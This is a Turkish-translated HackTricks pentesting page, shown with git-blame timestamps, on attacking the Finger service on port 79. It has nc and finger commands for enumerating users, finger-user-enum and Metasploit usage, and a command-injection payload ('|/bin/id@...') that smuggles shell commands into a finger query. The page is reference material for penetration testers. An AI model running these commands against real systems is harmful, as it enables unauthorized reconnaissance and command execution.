hacktricks/network-services-pentesting/pentesting-finger.md

96 lines
6.3 KiB
Markdown
Raw Normal View History

2022-05-08 23:13:03 +00:00
# 79 - Pentesting Finger
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hackleme becerilerinizi sıfırdan ileri seviyeye taşıyın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong>!</summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 18:14:16 +00:00
## **Temel Bilgiler**
2024-02-10 18:14:16 +00:00
**Finger** programı/hizmeti, bilgisayar kullanıcıları hakkında bilgi almak için kullanılır. Genellikle sağlanan bilgiler, **kullanıcının giriş adı, tam adı** ve bazı durumlarda ek bilgileri içerir. Bu ek bilgiler, kullanıcının ofis konumu ve telefon numarası (varsa), kullanıcının oturum açma zamanı, etkinlik dışı kalma süresi (boşta kalma süresi), kullanıcının en son okuduğu posta ve kullanıcının plan ve proje dosyalarının içeriği olabilir.
2024-02-10 18:14:16 +00:00
**Varsayılan port:** 79
2022-05-08 23:13:03 +00:00
```
PORT STATE SERVICE
79/tcp open finger
```
2024-02-10 18:14:16 +00:00
## **Sorgulama**
2024-02-10 18:14:16 +00:00
### **Banner Yakalama/Temel bağlantı**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
2024-02-10 18:14:16 +00:00
### **Kullanıcı numaralandırma**
User enumeration is the process of gathering information about valid usernames on a target system. This information can be used by an attacker to launch further attacks, such as brute-forcing passwords or attempting to gain unauthorized access to user accounts.
Kullanıcı numaralandırma, hedef sistemde geçerli kullanıcı adları hakkında bilgi toplama sürecidir. Bu bilgi, saldırgan tarafından şifreleri kaba kuvvetle kırmak veya kullanıcı hesaplarına izinsiz erişim sağlamak gibi daha fazla saldırı başlatmak için kullanılabilir.
One common method of user enumeration is through the Finger service. The Finger service is a network protocol that allows users to retrieve information about other users on a remote system. By default, the Finger service is often enabled on Unix-based systems.
Kullanıcı numaralandırmanın yaygın bir yöntemi, Finger servisi aracılığıyla gerçekleştirilir. Finger servisi, kullanıcıların uzak bir sistemdeki diğer kullanıcılar hakkında bilgi almasına izin veren bir ağ protokolüdür. Varsayılan olarak, Finger servisi genellikle Unix tabanlı sistemlerde etkinleştirilir.
To perform user enumeration using the Finger service, an attacker can send a query to the Finger service with a specific username. If the username exists on the target system, the Finger service will respond with information about that user, such as their full name, login shell, and other details.
Finger servisini kullanarak kullanıcı numaralandırma yapmak için, saldırgan belirli bir kullanıcı adıyla Finger servisine bir sorgu gönderebilir. Eğer kullanıcı adı hedef sistemde varsa, Finger servisi o kullanıcı hakkında bilgileri, tam adı, giriş kabuğu ve diğer ayrıntılar gibi, içeren bir yanıt gönderecektir.
2024-02-10 18:14:16 +00:00
To protect against user enumeration through the Finger service, it is recommended to disable or restrict access to the Finger service on the target system. Additionally, implementing strong password policies and monitoring for any suspicious activity can help mitigate the risk of unauthorized access to user accounts.
2024-02-10 18:14:16 +00:00
Finger servisi aracılığıyla kullanıcı numaralandırmaya karşı korunmak için, hedef sistemde Finger servisini devre dışı bırakmak veya erişimi kısıtlamak önerilir. Ayrıca, güçlü şifre politikaları uygulamak ve herhangi bir şüpheli faaliyeti izlemek, kullanıcı hesaplarına izinsiz erişim riskini azaltmaya yardımcı olabilir.
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
2024-02-10 18:14:16 +00:00
Alternatif olarak, [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) adresinden **finger-user-enum** kullanabilirsiniz, bazı örnekler:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2024-02-10 18:14:16 +00:00
#### **Nmap, varsayılan komut dosyalarını kullanmak için bir komut dosyası çalıştırır**
2024-02-10 18:14:16 +00:00
### Metasploit, Nmap'tan daha fazla hile kullanır
2022-05-08 23:13:03 +00:00
```
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
* `port:79 USER`
2024-02-10 18:14:16 +00:00
## Komut yürütme
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2024-02-10 18:14:16 +00:00
## Parmak Yönlendirme
2024-02-10 18:14:16 +00:00
[Bir sistem kullanarak parmak yönlendirme yapın](https://securiteam.com/exploits/2BUQ2RFQ0I/)
2022-05-08 23:13:03 +00:00
```
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
<details>
2024-02-10 18:14:16 +00:00
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
HackTricks'ı desteklemenin diğer yolları:
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
2022-04-28 16:01:33 +00:00
</details>